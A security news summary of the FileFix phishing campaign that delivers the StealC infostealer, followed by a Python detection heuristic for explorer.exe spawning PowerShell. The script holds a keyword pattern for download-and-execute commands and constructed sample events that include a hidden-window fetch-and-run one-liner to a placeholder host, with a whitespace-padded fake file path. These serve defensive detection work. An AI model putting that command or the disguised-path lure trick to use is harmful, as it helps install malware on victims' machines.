A new variant of the ClickFix family of social-engineering attacks, known as FileFix, has been observed tricking users into installing malware. The campaign impersonates Meta account-suspension warnings and uses a phishing page that hands the victim a disguised PowerShell command, which installs the StealC infostealer. StealC harvests sensitive data such as account and cloud credentials and cryptocurrency wallets.
The FileFix technique was devised by a red team researcher and abuses the File Explorer address bar: the bar accepts a command as well as a path, so a victim who pastes what looks like a file path into it actually runs the attacker's command. FileFix has appeared in earlier campaigns, but this one adds a multi-language phishing page and uses steganography to hide its payloads.
Acronis reports that over two weeks it observed multiple variants of the campaign, with different payloads, domains, and lures, which suggests the attackers are testing their infrastructure or refining their tactics.
To avoid falling victim, organizations should train employees on these newer phishing lures and on the risk of pasting anything from a website into a seemingly harmless system dialog such as the Run box or the File Explorer address bar. On the detection side, the execution chain leaves a usable signal: explorer.exe directly spawning powershell.exe or cmd.exe with a download-and-execute command line, which is worth alerting on.
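The detection idea above, as an added example that is not code from the article or from Acronis: a heuristic run over process-creation events in the shape of Windows telemetry such as Sysmon Event ID 1 (image, parent image, command line). The sample events are constructed, the field names are this example's own, and the padded fake-path check is taken from the original FileFix proof of concept rather than from this campaign.

```python
"""Heuristic for FileFix-style execution: a shell spawned by explorer.exe
with a pasted download-and-run command line.

Added example, not code from the article or from Acronis. Event fields
mirror Windows process-creation telemetry (e.g. Sysmon Event ID 1); the
sample events at the bottom are constructed, not real telemetry.
"""
import ntpath
import re
from dataclasses import dataclass

# Interpreters the File Explorer address bar (or the Run dialog) will launch
# when a command is pasted into it instead of a path.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
          "wscript.exe", "cscript.exe"}

# Traits of a one-liner that must fetch and run a second stage quietly.
FETCH_OR_HIDE = re.compile(
    r"(?i)(?:-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"
    r"|-w(?:indowstyle)?\s+hidden"
    r"|\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b"
    r"|frombase64string|\bcurl\b|\bmshta\b)"
)

# FileFix lures pad the command with whitespace and finish it with a comment
# that looks like a document path, so only the "path" shows in the narrow
# address bar. Pattern from the original FileFix proof of concept; treat it
# as a heuristic, not a requirement.
PADDED_FAKE_PATH = re.compile(r"\s{6,}#\s*[A-Za-z]:\\\S+\s*$")


@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str   # command line as logged


def filefix_indicators(ev: ProcessEvent) -> list[str]:
    """Return the reasons an event looks like FileFix; empty list if none.

    explorer.exe as parent is a weak signal on its own (Start menu and
    shortcut launches look the same), so callers should alert only when
    the command line also carries one of the other indicators.
    """
    child = ntpath.basename(ev.image).lower()
    parent = ntpath.basename(ev.parent_image).lower()
    if child not in SHELLS or parent != "explorer.exe":
        return []
    reasons = [f"{child} spawned directly by explorer.exe"]
    if FETCH_OR_HIDE.search(ev.command_line):
        reasons.append("download/execute or hidden-window switches")
    if PADDED_FAKE_PATH.search(ev.command_line):
        reasons.append("trailing comment disguised as a file path")
    return reasons


def is_filefix_candidate(ev: ProcessEvent) -> bool:
    """Alert only when the parent relationship AND a command-line trait match."""
    return len(filefix_indicators(ev)) >= 2


# Constructed sample events (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

SAMPLE_EVENTS = {
    # User opened PowerShell from the Start menu: explorer parent, bare command line.
    "start_menu": ProcessEvent(PS, EXPLORER, f'"{PS}"'),
    # A browser spawning a shell deserves its own rule, but it is not FileFix.
    "from_browser": ProcessEvent(
        PS, CHROME, f'"{PS}" -w hidden -c "iex (iwr http://example.invalid/a)"'),
    # Pasted lure: hidden window, fetch-and-run, padded fake path at the end.
    "filefix": ProcessEvent(
        PS, EXPLORER,
        'powershell.exe -w hidden -c "iex (iwr http://example.invalid/a)"'
        + " " * 40 + r"# C:\company\HR\Policy.pdf"),
}


if __name__ == "__main__":
    for name, ev in SAMPLE_EVENTS.items():
        verdict = "ALERT" if is_filefix_candidate(ev) else "ok"
        print(f"{name:12} {verdict:5} {filefix_indicators(ev)}")
```

The parent check alone would also fire on every shell opened from the Start menu, so the score requires a command-line trait as well; the same logic catches the older ClickFix Run-dialog variant, since the Run box is also hosted by explorer.exe.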
Source: https://www.bleepingcomputer.com/news/security/new-filefix-attack-uses-steganography-to-drop-stealc-malware